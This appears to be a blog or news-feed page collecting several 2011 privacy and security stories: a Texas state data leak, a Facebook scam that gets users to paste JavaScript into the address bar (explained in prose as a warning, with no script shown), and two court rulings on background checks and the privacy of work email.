State of Texas exposes data on 3.5 million people

Susan CombsSusan Combs, Comptroller for the state of Texas announced a massive data leak that resulted in 3.5 million people’s social security numbers, names, addresses and in some cases their birth date and drivers license number being exposed.

Unlike private companies who have had large releases of PII (Personally Identifiable Information) recently, the state of Texas is not providing credit monitoring or other services for the victims of their mistake. They are simply providing sage advice

The Comptroller’s office discovered on the afternoon of March 31st, 2011 that they had inadvertently placed the private information of the Teacher Retirement System of Texas (TRS), the Texas Workforce Commission (TWC) and the Employees Retirement System of Texas (ERS) on an internet accessible server.

The data was not encrypted, which is a breach of policy, as well and having bypassed several other policy rules within the state designed to protect people’s PII.

Encryption ScrabbleOften when I am talking with people at shows and seminars I ask them if they have an encryption program in place. Nearly always the answer is “Of course! We have deployed encryption to over 80% of our laptops already.”

I then ask about the servers, databases and other critical storage locations of sensitive data and I see a scary look in their eyes… They usually respond with “Oh, that’s OK, that information is all inside of our firewall.”

As we saw with Epsilon and many others before is that sensitive data must be protected regardless of the media or location it is stored.

To learn more about what you can do, download our paper “Protecting PII: Take 8 Steps to Protect“.

Facebook scam with a difference – Social Tagging Worldwide avoids rogue apps

Vigilant Naked Security reader Mike Greer, of Cedar Park, Texas, has brought the latest Facebook “profile viewer” scam to our attention.

We write regularly about this sort of scam, which is common on Facebook, on Twitter, and even on both at the same time.

One of the reasons people fall for these scams is that they promise to provide what sounds like useful data – a list of the people who are most interested in your activities. In particular, most of the scams imply that anyone who is stalking you is likely to end up at the top of the list of people who check your profile.

(Of course, the people at the top of the list might equally well be your closest and most trusted friends. But profile view scams sell better on fear than on comfort.)

Most scams of this sort persuade you to install a rogue Facebook application and give it permission to access your account. But this latest scam, centred around a Facebook community called Social Tagging Worldwide, takes a different approach.

The Social Tagging Worldwide page is much more direct. It tries to trick you into pasting JavaScript directly in your browser and running it. Naturally, this bypasses any checks which Facebook might apply to the script if it were served up from, or wrapped inside, a web page sourced from Facebook itself.

Claiming to be “The Official Profile Viewer Application”, the page offers you a link which brings up a Facebook dialog asking you to “complete a 5 second security check to confirm you’re a Facebook user”:

The instructions sounds pretty simple, and – unlike many other Facebook scams – don’t involve asking you to take a survey as proof that you aren’t a computer. The instructions may vary depending on your browser, but will look something like this:

The trick is that you aren’t cutting-and-pasting any sort of unique ID into your browser’s address bar. You’re actually pasting a piece of Javascript and asking your browser to run it for you:

This script fetches another script – one intended to run inside pages presented by Facebook. Indeed, if you paste the offending “unique ID script” into your browser’s address bar whilst you’re on a site other than Facebook – e.g. Naked Security – you’ll see a warning that the script needs to come from Facebook itself:

But if your browser is on the original Social Tagging Worldwide community page – which is hosted by Facebook.com – and you are logged into Facebook, the pasted script runs as if it were hosted on facebook.com. Your browser thinks – indeed, effectively knows – that you’re on Facebook, because that’s the domain of the URL you are currently visiting.

The offending script in this case is designed to invite all your friends to join a specific Facebook group. No need for a rogue application.

The moral of this story is simple: BE CAREFUL WHAT YOU PASTE INTO YOUR ADDRESS BAR.

When you explicitly enter a piece of JavaScript, you’re effectively authorising your browser to run that script in the context of the site you’ve just visited. You are effectively bypassing any sort of cross-site scripting protection which either the remote site – in this case, Facebook – or your browser might have in place.

Cross-site scripting is where you trick your browser into running a script from site Y as if it were officially from site X. Pasting a script into the browser side-steps any cross-site scripting protection because there isn’t really any “cross-site” behaviour – you’re manually injecting a script into site X and thus authorising it to run yourself.

Incidentally, if you do go through with the instructions in this scam, things proceed rather predictably.

You’re asked to perform another “proof that you are human” test, and this time – I’m sure you’ve guessed already – you need to take a survey. The survey offers a prize – I’m sure you’ve guessed already – of an iPad or an iPhone:

And to win the prize – I’m sure you’ve guessed already – there’s a cost. The advance fee you’ll pay to enter the “competition” depends on your location.

I’m in Singapore right now, where I was expected to send a pricy SMS and agree to accept SMS marketing:

By the way, there’s a simple, non-technical, rule which will protect you from almost all scams of this sort:

IF IT SOUNDS TOO GOOD TO BE TRUE, IT IS TOO GOOD TO BE TRUE!

Make sure that you stay informed about the latest online scams. Join the Sophos Facebook page, where more than 70,000 people regularly share information on threats and discuss the latest security news.

While you’re about it, why not check out our Facebook security best practice guide? Learn how to protect your privacy and identity on Facebook.

Supreme Court Upholds Intrusive Government Background Checks

The Supreme Court ruled unanimously Wednesday that U.S. government contractors must undergo the same background checks as federal employees.

A lower court had declared the checks an unconstitutional “broad inquisition” when applied to the contractors.

The challenged background investigations sought information from any source surrounding an employee’s sex life, finances and drug use. The background checks for contractors were required beginning in 2007, and were challenged by nearly three dozen NASA contractors as being too invasive. The contractors neither sought, nor were granted, security clearances for classified information.

Ruling 8-0, with Justice Elena Kagan recused, the court found there was no breach in the contractors’ right to so-called “informational privacy.” The checks were “reasonable, employment-related inquiries that further the government’s interests in managing its internal operations,” the court concluded.

So the court, in overturning the 9th U.S. Circuit Court of Appeals, agreed with the Obama administration’s contentions that the NASA Jet Propulsion Laboratory workers’ privacy rights were not breached. The government, the court noted, was not releasing the information to the public.

“In light of the protection provided by the Privacy Act’s nondisclosure requirement, and because the challenged portions of the forms consist of reasonable inquiries in an employment background check, we conclude that the government’s inquiries do not violate a constitutional right to informational privacy,” Justice Samuel Alito wrote for the court.

Justice Antonin Scalia, in a concurring opinion joined by Justice Clarence Thomas, said there was no constitutional right to informational privacy — a premise “consistent with constitutional text and tradition.”

Holding such a position, Scalia wrote, “has the attractive benefit of resolving this case” without having to rationalize the background checks.

The Obama administration told the justices the checks were the same type conducted on all federal government workers -– now numbering about 14 million. Those background checks were part of a 2004 security directive from President George W. Bush.

The court pointed out that some of the contractors at the Jet Propulsion Laboratory outside of Los Angeles held high-level positions, including the lead “trouble shooter” for the Kepler space observatory. Another was among the lead “trajectory designers” for the Galileo Project and the Apollo moon landings.

See Also:

Work E-Mail Not Protected by Attorney-Client Privilege, Court Says

E-mails between a client and attorney are no longer considered privileged and confidential if the client writes the messages from a work e-mail account, a California court of appeals has ruled.

The 3-0 decision Thursday by the Sacramento Third Appellate District means that if you intend to sue your employer, don’t discuss the suit with an attorney using company e-mail. The company has a right to access it and use it against you in a court.

“… [T]he e-mails sent via company computer under the circumstances of this case were akin to consulting her lawyer in her employer’s conference room, in a loud voice, with the door open, so that any reasonable person would expect that their discussion of her complaints about her employer would be overheard,” (.pdf) the court wrote.

Case law on electronic privacy in the workplace is slowly evolving, and not always for the best.

The U.S. Supreme Court in July ruled that a police officer’s texts on department pagers were not private. But that ruling was based on grounds other than the Ontario Police Department’s policy that said text messages on work pagers were not private.

The New Jersey Supreme Court said e-mail messages on a personal web-based e-mail account accessed from an employer’s computer were private. But that decision was contingent on the fact that use of such an account was not clearly covered by the company’s policy, and the e-mails in question contained a standard warning that the communications were personal, confidential, attorney-client communications.

In this most recent California appeals case, a secretary claimed her small-business employer became hostile when it found out she was pregnant shortly after being hired in 2004.

The company, Petrovich Development of Sacramento, California, introduced the e-mail at trial “to show Holmes did not suffer severe emotional distress, was only frustrated and annoyed, and filed the action at the urging of her attorney,” the court noted. On appeal, Holmes claimed the lower courts erred in allowing the e-mail into the case, which the developer had won.

The appeals court said Gina Holmes’ e-mails to her lawyer were not confidential because her employer had a written policy that company e-mail was not private and subject to audit.

The court said Holmes “used her employer’s company e-mail account after being warned that it was to be used only for company business, that e-mails were not private, and that the company would randomly and periodically monitor its technology resources to ensure compliance with the policy.”

Photo: Jeff Hitchcock/Flickr